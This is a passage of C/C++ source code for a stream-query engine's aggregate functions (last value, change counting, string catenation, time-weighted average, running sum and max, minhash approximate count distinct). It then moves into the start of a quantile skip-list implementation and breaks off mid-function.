void LAST_HFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
// int
void LAST_HFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
// llong
void LAST_HFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
// ullong
void LAST_HFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	*scratch = val;
}
void LAST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
// string
void LAST_HFTA_AGGR_INIT_(vstring* scratch) {
	scratch->offset= 0;
}
void LAST_HFTA_AGGR_REINIT_(vstring* scratch) { }
void LAST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
	// shallow copy: scratch aliases the incoming value's buffer
	scratch->length = val->length;
	scratch->offset = val->offset;
	scratch->reserved = SHALLOW_COPY;
}
void LAST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
	*res = *scratch;
}
void LAST_HFTA_AGGR_DESTROY_(vstring* scratch) { }
// hfta/lfta split versions of LAST: identical semantics to the hfta-only
// family above, with type-suffixed names for per-type resolution.
void LAST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch) { }
void LAST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	*scratch = val;
}
void LAST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
void LAST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch) { }
void LAST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	*scratch = val;
}
void LAST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void LAST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch) { }
void LAST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	*scratch = val;
}
void LAST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void LAST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch) { }
void LAST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	*scratch = val;
}
void LAST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void LAST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch) { }
void LAST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
	scratch->offset= 0;
}
void LAST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
void LAST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
	// shallow copy: scratch aliases the incoming value's buffer
	scratch->length = val->length;
	scratch->offset = val->offset;
	scratch->reserved = SHALLOW_COPY;
}
void LAST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
	*res = *scratch;
}
void LAST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) { }
////////////////////////////////////////////////////////////
// count different (# of times the value is different than the previous)
// Scratch keeps a change counter plus the previously-seen value; the
// union lets one scratch layout serve all supported input types.
struct count_diff_scratch{
	gs_uint32_t count;
	union{
		gs_uint32_t ui;
		gs_int32_t i;
		gs_uint64_t ul;
		gs_int64_t l;
	} r;
};
////////// HFTA only
// uint32
void count_diff_HFTA_AGGR_INIT_(gs_sp_t s){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	scratch->count = 0;
	scratch->r.ul = 0;
}
void count_diff_HFTA_AGGR_REINIT_(gs_sp_t s){
	// carry r (the last seen value) across windows; only reset the counter
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	scratch->count = 0;
}
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	// the first element always counts as a change
	if(scratch->count==0 || scratch->r.ui != val)
		scratch->count++;
	scratch->r.ui = val;
}
void count_diff_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	*res = scratch->count;
}
void count_diff_HFTA_AGGR_DESTROY_(gs_sp_t s){ }
// int32
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	if(scratch->count==0 || scratch->r.i != val)
		scratch->count++;
	scratch->r.i = val;
}
// uint64
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	if(scratch->count==0 || scratch->r.ul != val)
		scratch->count++;
	scratch->r.ul = val;
}
// int64
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	if(scratch->count==0 || scratch->r.l != val)
		scratch->count++;
	scratch->r.l = val;
}
// vstring
// Strings are compared via a 64-bit hash of the value, so a hash
// collision between consecutive distinct strings can miss a change.
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring* val){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	gs_uint64_t hashval = hfta_vstr_long_hashfunc(val);
	if(scratch->count==0 || scratch->r.l != hashval)
		scratch->count++;
	scratch->r.l = hashval;
}
////////// HFTA / LFTA split
// The lfta side serializes a partial result consisting of its change
// count plus the first and last values of its chunk, so consecutive
// chunks can be stitched together on the hfta side.
struct lfta_count_diff_scratch{
	gs_uint32_t count;
	union{
		gs_uint32_t ui;
		gs_int32_t i;
		gs_uint64_t ul;
		gs_int64_t l;
	} first;
	union{
		gs_uint32_t ui;
		gs_int32_t i;
		gs_uint64_t ul;
		gs_int64_t l;
	} last;
};
void count_diff_hfta_HFTA_AGGR_INIT_(gs_sp_t s){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	scratch->count = 0;
	scratch->r.ul = 0;
}
void count_diff_hfta_HFTA_AGGR_REINIT_(gs_sp_t s){
	// unlike the hfta-only variant, r is reset here too; the +1 in OUTPUT
	// compensates for the lost "first element" change
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	scratch->count = 0;
	scratch->r.ul = 0;
}
// Merge one lfta-side partial result into the hfta-side scratch.
// v is a vstring whose payload (v->offset) is a serialized
// lfta_count_diff_scratch; s is the hfta accumulator.
// BUG FIX: the original cast the vstring header itself to
// lfta_count_diff_scratch and used v->offset as the hfta scratch,
// ignoring the scratch parameter s entirely.  The lfta partial lives at
// v->offset and the accumulator is s.
void count_diff_hfta_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *v){
	lfta_count_diff_scratch *val = (lfta_count_diff_scratch *)(v->offset);
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	// val->count includes the chunk's first element as a change; subtract
	// it and re-check that element against the last value carried over
	// from the previous chunk.
	scratch->count += val->count - 1;
	if(scratch->r.l != val->first.l)
		scratch->count++;
	scratch->r.l = val->last.l;
}
void count_diff_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s){
	count_diff_scratch *scratch = (count_diff_scratch *)s;
	// +1 compensates for the first-element change dropped during merging
	*res = (scratch->count)+1;
}
void count_diff_hfta_HFTA_AGGR_DESTROY_(gs_sp_t scratch){ }
/////////////////////////////////////////////////////////
// running_array_aggr aggregate: build a comma-separated textual list of
// all uint32 words received, in arrival order.
void running_array_aggr_hfta_HFTA_AGGR_INIT_(vstring* scratch) {
	// NULL payload marks an empty accumulator
	scratch->offset = (gs_p_t)NULL;
	scratch->length = 0;
}
void running_array_aggr_hfta_HFTA_AGGR_REINIT_(vstring* scratch) { }
// Append the uint32 words of val, comma-separated, to the growing list
// in scratch.
// BUG FIX: the original switch only formatted 0..4 words; any longer
// input fell through with `buffer` uninitialized, making the subsequent
// strlen undefined behavior.  Format generically instead, truncating
// (rather than overflowing) when the local buffer would be exceeded.
void running_array_aggr_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val) {
	char buffer[100];
	gs_uint32_t* ints = (gs_uint32_t*)val->offset;
	gs_uint32_t n = val->length / sizeof (gs_uint32_t);
	if (n == 0)
		return;			// nothing to append
	int pos = 0;
	for (gs_uint32_t i = 0; i < n; ++i) {
		// worst case per element: ',' + 10 digits + NUL = 12 bytes
		if (pos > (int)sizeof(buffer) - 12)
			break;		// truncate rather than overflow the buffer
		pos += sprintf(buffer + pos, (i == 0) ? "%u" : ",%u", ints[i]);
	}
	int buf_len = pos;
	// append the content of buffer to scratch
	if (!scratch->offset) {
		Vstring_Constructor(scratch, buffer);
	} else {
		scratch->offset = (gs_p_t)realloc((void*)scratch->offset, scratch->length + buf_len + 1);
		*((char*)scratch->offset + scratch->length) = ',';
		memcpy((void*)(scratch->offset + scratch->length + 1), (void*)buffer, buf_len);
		scratch->length += buf_len + 1;
		scratch->reserved = INTERNAL;
	}
}
void running_array_aggr_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch) {
	// hand out a shallow view; the scratch still owns the buffer
	*res = *scratch;
	res->reserved = SHALLOW_COPY;
}
void running_array_aggr_hfta_HFTA_AGGR_DESTROY_(vstring* scratch) {
	hfta_vstr_destroy(scratch);
}
////////////////////////////////////////////
// Aggregate strings by catenation
// The scratch area only stores a pointer; the accumulated std::string is
// heap-allocated in INIT and freed in DESTROY.
struct CAT_aggr_scratch{
	std::string val;
	int x;		// NOTE(review): set to 101 in INIT, never read -- presumably a debug marker
};
struct CAT_aggr_scratch_ptr{
	CAT_aggr_scratch *ptr;
};
void CAT_aggr_HFTA_AGGR_INIT_(gs_sp_t s){
	CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
	CAT_aggr_scratch *v = new CAT_aggr_scratch();
	v->x = 101;
	p->ptr = v;
}
void CAT_aggr_HFTA_AGGR_REINIT_(gs_sp_t s){
	// reuse the heap object across windows; just clear the text
	CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
	CAT_aggr_scratch *v = p->ptr;
	v->val="";
}
// Append str to the accumulator, inserting sep before it except for the
// first element.
void CAT_aggr_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *sep, vstring *str){
	//char buf1[MAXTUPLESZ-20], buf2[MAXTUPLESZ-20];
	//int i;
	//for(i=0;i<sep->length;++i) buf1[i] = *(((char *)sep->offset)+i);
	//buf1[i]='\0';
	//for(i=0;i<str->length;++i) buf2[i] = *(((char *)str->offset)+i);
	//buf2[i]='\0';
	CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
	CAT_aggr_scratch *v = p->ptr;
	if(v->val.size()>0)
		v->val.append((char *)(sep->offset), sep->length);
	v->val.append((char *)(str->offset), str->length);
	//printf("sep=%s, str=%s, val=%s\n",buf1,buf2,v->val.c_str());
}
void CAT_aggr_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s){
	CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
	CAT_aggr_scratch *v = p->ptr;
	//printf("output val=%s\n",v->val.c_str());
	// allocate for the full string, but clamp the reported length to the
	// maximum tuple payload
	res->offset = (gs_p_t)malloc(v->val.size());
	res->length = v->val.size();
	if(res->length>MAXTUPLESZ-20)
		res->length=MAXTUPLESZ-20;
//	v->val.copy((char *)(res->offset), 0, res->length);
	const char *dat = v->val.c_str();
	memcpy((char *)(res->offset), dat, res->length);
//	for(int i=0;i<res->length;++i)
//		*(((char *)res->offset)+i) = dat[i];
	res->reserved = INTERNAL;
}
void CAT_aggr_HFTA_AGGR_DESTROY_(gs_sp_t s){
	CAT_aggr_scratch_ptr *p = (CAT_aggr_scratch_ptr *)s;
	CAT_aggr_scratch *v = p->ptr;
	delete v;
}
///////////////////////////////////////////////////////////////
// time_avg((sample, ts, window_size)
// Compute time-weighted average sum(sample*duration)/window_size
// duration is difference between current and next ts.
// The idea is to compute a sum over a step function.
//
struct time_avg_udaf_str{
	gs_float_t sum;			// accumulated value*duration so far
	gs_float_t last_val;		// most recent sample
	gs_uint64_t last_ts;		// timestamp of most recent sample
	gs_uint64_t window;		// window size (set on every update)
	gs_uint64_t first_ts;		// first timestamp ever seen (0 = none yet)
	gs_uint8_t event_occurred;	// any sample seen in the current window?
};
void time_avg_HFTA_AGGR_INIT_(gs_sp_t s){
	time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
	scratch->sum = 0.0;
	scratch->last_val = 0.0;
	scratch->last_ts = 0;
	scratch->first_ts = 0;
	scratch->event_occurred = 0;
}
void time_avg_HFTA_AGGR_DESTROY_(gs_sp_t s){
}
void time_avg_HFTA_AGGR_REINIT_(gs_sp_t s){
	// new window: clear the integral but keep last_val/last_ts so the step
	// function continues across window boundaries
	time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
	scratch->event_occurred = 0;
	scratch->sum = 0;
//printf("time_avg_reinit: occurred=%d, last_val=%lf, sum=%lf, first_ts=%lld, last_ts=%lld\n",scratch->event_occurred, scratch->last_val, scratch->sum, scratch->first_ts, scratch->last_ts);
}
void time_avg_HFTA_AGGR_OUTPUT_(gs_float_t *result, gs_sp_t s){
	time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
	if(scratch->event_occurred==0){
		// no samples this window: the step function is flat at last_val
		*result = scratch->last_val;
//printf("\ttime_avg outpt1 sum=%lf, last_val=%lf, result=%lf\n", scratch->sum, scratch->last_val, *result);
		return;
	}
	// close the integral at the end of the window containing last_ts
	gs_int64_t end_time = scratch->window * (scratch->last_ts/scratch->window + 1);
	scratch->sum += (end_time - scratch->last_ts) * (gs_float_t)(scratch->last_val);
	gs_int64_t start_time = end_time - scratch->window;
	if(scratch->first_ts > start_time){
		// first-ever window may be partial: normalize by the covered span
		*result = scratch->sum / (end_time - scratch->first_ts);
//printf("\ttime_avg outpt2 sum=%lf, start_time=%lld, end_time=%lld, first_ts=%lld, last_ts=%lld,result=%lf\n", scratch->sum, start_time, end_time, scratch->first_ts, scratch->last_ts, *result);
	}else{
		*result = scratch->sum / (end_time - start_time);
//printf("\ttime_avg outpt3 sum=%lf, start_time=%lld, end_time=%lld, first_ts=%lld, last_ts=%lld,result=%lf\n", scratch->sum, start_time, end_time, scratch->first_ts, scratch->last_ts, *result);
	}
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_float_t val, gs_int64_t ts, gs_int64_t window){
	time_avg_udaf_str *scratch = (time_avg_udaf_str *)s;
	scratch->window = window;
	if(scratch->first_ts==0){
		// NOTE(review): a legitimate ts of 0 is indistinguishable from
		// "never updated" -- presumably timestamps are always > 0; confirm.
		scratch->first_ts = ts;
	}else{
		if(scratch->event_occurred){
			// extend the integral from the previous sample in this window
			scratch->sum += (ts - scratch->last_ts) * scratch->last_val;
		}else{
			// first sample of the window: integrate from the window start
			gs_int64_t start_time = scratch->window * (scratch->last_ts/scratch->window);
			scratch->sum += (ts - start_time) * scratch->last_val;
		}
	}
//printf("time_avg_upd: val=%lf, occurred=%d, last_val=%lf, sum=%lf, ts=%lld, first_ts=%lld, last_ts=%lld\n",val, scratch->event_occurred, scratch->last_val, scratch->sum, ts, scratch->first_ts, scratch->last_ts);
	scratch->last_val = val;
	scratch->last_ts = ts;
	scratch->event_occurred = 1;
}
// Integer overloads delegate to the float implementation.
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val, gs_int64_t ts, gs_int64_t window){
	time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val, gs_int64_t ts, gs_int64_t window){
	time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val, gs_int64_t ts, gs_int64_t window){
	time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val, gs_int64_t ts, gs_int64_t window){
	time_avg_HFTA_AGGR_UPDATE_(s, (gs_float_t)val, ts, window);
}
// ------------------------------------------------------------
// running_sum_max : get the running sum of an int,
//	be able to report this sum and also its max value
//	during the time window
struct run_sum_max_udaf_str{
	gs_int64_t sum;		// running sum, carried across windows
	gs_int64_t max;		// max of the running sum within the window
};
void run_sum_max_HFTA_AGGR_INIT_(gs_sp_t s){
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->sum = 0;
	scratch->max = 0;
}
void run_sum_max_HFTA_AGGR_REINIT_(gs_sp_t s){
	// keep the running sum; restart the per-window max from it
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->max = scratch->sum;
}
void run_sum_max_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b){
	// expose the raw scratch bytes; callers use the extr_* functions below
	r->length = sizeof(run_sum_max_udaf_str);
	r->offset = (gs_p_t)(b);
	r->reserved = SHALLOW_COPY;
}
void run_sum_max_HFTA_AGGR_DESTROY_(gs_sp_t b){
	return;
}
// UPDATE overloads: add v to the running sum and track the max reached.
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t v){
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->sum+=v;
	if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t v){
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->sum+=v;
	if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t v){
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->sum+=v;
	if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t v){
	run_sum_max_udaf_str *scratch = (run_sum_max_udaf_str *)s;
	scratch->sum+=v;
	if(scratch->sum>scratch->max) scratch->max=scratch->sum;
}
// the extraction functions
// Each validates the serialized size before dereferencing.
gs_int64_t extr_running_sum(vstring *v){
	if(v->length != sizeof(run_sum_max_udaf_str)) return 0;
	run_sum_max_udaf_str *vs = (run_sum_max_udaf_str *)(v->offset);
	return vs->sum;
}
gs_int64_t extr_running_sum_max(vstring *v){
	if(v->length != sizeof(run_sum_max_udaf_str)) return 0;
	run_sum_max_udaf_str *vs = (run_sum_max_udaf_str *)(v->offset);
	return vs->max;
}
// ---------------------------------------------
// aggr_diff : from a sequence of strings, collect
//	the ones which are different than the previous.
//	this includes the prior time period.
//	the idea is to see the sequence of handovers
// Scratch stores a heap pointer; the strings live on the heap so the
// fixed-size scratch area stays small.
struct CAT_aggr_diff_scratch{
	std::string val;	// ':'-separated catenation of distinct-in-sequence strings
	std::string prev_s;	// previous string, carried across windows
//	gs_int64_t prev_ts;	// for now, just catenate strings
};
struct CAT_aggr_diff_scratch_ptr{
	CAT_aggr_diff_scratch *ptr;
};
void CAT_aggr_diff_HFTA_AGGR_INIT_(gs_sp_t s){
	CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
	CAT_aggr_diff_scratch *v = new CAT_aggr_diff_scratch();
	v->prev_s = "";
	v->val = "";
	p->ptr = v;
}
void CAT_aggr_diff_HFTA_AGGR_REINIT_(gs_sp_t s){
	// seed the new window's catenation with the carried-over last string
	CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
	CAT_aggr_diff_scratch *v = p->ptr;
	v->val=v->prev_s;
}
// Append str to the catenation only when it differs from the previously
// seen string.
// BUG FIX: the original copied str->length bytes and then wrote a NUL
// terminator one past them; an input with length >= MAXTUPLESZ-20
// overflowed the local buffer.  Clamp the copy so the terminator always
// fits.
void CAT_aggr_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *str){
	char str_buf[MAXTUPLESZ-20];
	gs_uint32_t cpy = str->length;
	if (cpy > sizeof(str_buf) - 1)
		cpy = sizeof(str_buf) - 1;	// leave room for the NUL
	gs_uint32_t i;
	for(i=0;i<cpy;++i) str_buf[i] = *(((char *)str->offset)+i);
	str_buf[i]='\0';
	CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
	CAT_aggr_diff_scratch *v = p->ptr;
	if(str_buf != v->prev_s){	// std::string content comparison, not pointer compare
		if(v->val.size()>0)
			v->val += ':';
		v->val += str_buf;
		v->prev_s = str_buf;
	}
}
void CAT_aggr_diff_HFTA_AGGR_OUTPUT_(gs_sp_t s){
	CAT_aggr_diff_scratch_ptr *p = (CAT_aggr_diff_scratch_ptr *)s;
	CAT_aggr_diff_scratch *v = p->ptr;
	delete v;
}
// ---------------------------------------------
// Approximate count distinct.
// Rely on the minhashing approach.
// Currently HFTA-only
// Uses a 32-bit hash, tested up to 100,000,000 elements
// and it gave good results (within 7%)
#define COUNT_DISTINCT_NREPS 250
#define COUNT_DISTINCT_MAX_STRING_LEN 200 // number of 4-byte words
static Hash32bit2univID hids[COUNT_DISTINCT_NREPS];
static int approx_count_distinct_udaf_initialized = 0;
struct approx_count_distinct_udaf_str{
unsigned int mn[COUNT_DISTINCT_NREPS];
};
void approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)buf;
for(int i=0;i<COUNT_DISTINCT_NREPS;++i)
cd->mn[i]=4294967295;
if(approx_count_distinct_udaf_initialized==0){
for(int i=0;i<COUNT_DISTINCT_NREPS;++i)
hids[i] = InitStringHash32bit2univ(COUNT_DISTINCT_MAX_STRING_LEN);
approx_count_distinct_udaf_initialized=1;
}
}
void running_approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf){
approx_count_distinct_udaf_HFTA_AGGR_INIT_(buf);
}
void approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf){ }
void running_approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf){}
void approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){ }
void running_approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf){ }
void approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)buf;
unsigned int buffer[sizeof(unsigned int)*COUNT_DISTINCT_MAX_STRING_LEN];
buffer[val->length/4] = 0;
memcpy((char *)buffer, (char *)val->offset, min(val->length, 800));
unsigned int len4 = val->length/4 + ((val->length&0x03)>0);
for(int i=0; i<COUNT_DISTINCT_NREPS; ++i){
unsigned int h = StringHash32bit2univ(buffer, len4, hids[i]);
if(h < cd->mn[i]) cd->mn[i] = h;
}
}
void running_approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val){
approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(buf, val);
}
void approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf){
res->offset = (gs_p_t)buf;
res->length = sizeof(approx_count_distinct_udaf_str);
res->reserved = SHALLOW_COPY;
}
void running_approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf){
approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(res, buf);
}
gs_float_t extr_approx_count_distinct(vstring *v){
approx_count_distinct_udaf_str *cd = (approx_count_distinct_udaf_str *)(v->offset);
gs_float_t avg = 0.0;
for(int i=0;i<COUNT_DISTINCT_NREPS;++i){
avg += cd->mn[i];
}
avg /= COUNT_DISTINCT_NREPS;
gs_float_t est = (4294967295.0 / avg) - 1;
return est;
}
<file_sep>#include <stdio.h>
#include <limits.h>
#include <math.h>
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
#include "udaf_common.h"
/* Full size
// NOTE: does not seem to be stable or correct with this setting
// compress only activates with this one, so compress is broken?
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 100
*/
/* half size
*/
// #define QUANT_LFTA1_SIZE 378
// #define QUANT_LFTA2_SIZE 93
// #define QUANT_LFTA3_SIZE 50
/* quarter size
#define QUANT_LFTA1_SIZE 202
#define QUANT_LFTA2_SIZE 49
#define QUANT_LFTA3_SIZE 25
*/
// #define QUANT_EPS 0.01
// #define SKIPDIR_SIZE 100
// #define SKIPDIR_HEIGHT_MAX 7
//#define max(a,b) ((a) > (b) ? (a) : (b))
#define COMPRESSED_XFER
/****************************************************************/
/* Data Structures */
/****************************************************************/
template <class T> struct tuple_t {
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_uint32_t next;
};
// For skip list
template <class T> struct skipnode_t {
T val;
gs_uint32_t next;
gs_uint32_t down;
};
template <class T> struct skipdir_t {
gs_uint32_t height; // height of tree
gs_uint32_t freeptr; // cursor space stack
gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX+1]; // ptrs to levels
skipnode_t<T> list[SKIPDIR_SIZE+1];
} ;
/****************************************************************/
// fstring(5+(QUANT_LFTA3_SIZE+1)*4 +
// (2+lg(QUANT_LFTA3_SIZE)+(QUANT_LFTA3_SIZE+1)*3)*4)
template <class T> struct quant_udaf_lfta3_struct_t {
gs_uint32_t nelts; // # stream elements
gs_uint32_t freeptr; // ptr to cursor stack
gs_uint32_t usedptr; // ptr to allocated memory
gs_uint32_t circptr; // circulating ptr used for compression
gs_uint32_t size;
tuple_t<T> t[QUANT_LFTA3_SIZE+1]; // samples + auxiliary info
skipdir_t<T> sd; // directory for searching tuples
} ;
/****************************************************************/
/* Skip List Functions */
/****************************************************************/
// Skip list cursor stack operations
template <class T> gs_uint32_t skipdir_alloc(skipdir_t<T> *sd)
{
gs_uint32_t ptr = sd->freeptr;
if (sd->freeptr != 0)
sd->freeptr = sd->list[ptr].next;
//printf("skipdir_alloc %d\n",ptr);
return ptr;
}
template <class T> void skipdir_free(skipdir_t<T> *sd, gs_uint32_t ptr)
{
sd->list[ptr].val = 0;
sd->list[ptr].down = 0;
sd->list[ptr].next = sd->freeptr;
sd->freeptr = ptr;
//printf("skipdir_free %d\n",ptr);
}
template <class T> void skipdir_create(skipdir_t<T> *sd)
{
gs_int32_t i;
sd->height = 0;
sd->freeptr = 1;
for (i=0; i < SKIPDIR_HEIGHT_MAX; i++)
sd->headptr[i] = 0;
for (i=1; i < SKIPDIR_SIZE; i++)
sd->list[i].next = i+1;
sd->list[SKIPDIR_SIZE].next = 0;
}
template <class T> void skipdir_destroy(skipdir_t<T> *sd)
{
sd->height = 0;
}
template <class T> void skipdir_search(skipdir_t<T> *sd, T val, gs_uint32_t *ptrstack)
{
gs_uint32_t ptr;
gs_int32_t l;
if (sd->height == 0) {
ptrstack[0] = ptrstack[1] = 0;
return;
}
// search nonleaf nodes
ptr = sd->headptr[sd->height-1];
for (l=sd->height-1; l >= 0; l--) {
if (ptr == 0) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else if (val <= sd->list[ptr].val) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else {
while ((sd->list[ptr].next != 0) &&
(sd->list[sd->list[ptr].next].val < val))
ptr = sd->list[ptr].next;
ptrstack[l+1] = ptr;
ptr = sd->list[ptr].down;
}
}
ptrstack[0] = ptr;
}
template <class T> void skipdir_insert(skipdir_t<T> *sd, gs_uint32_t *ptrstack,
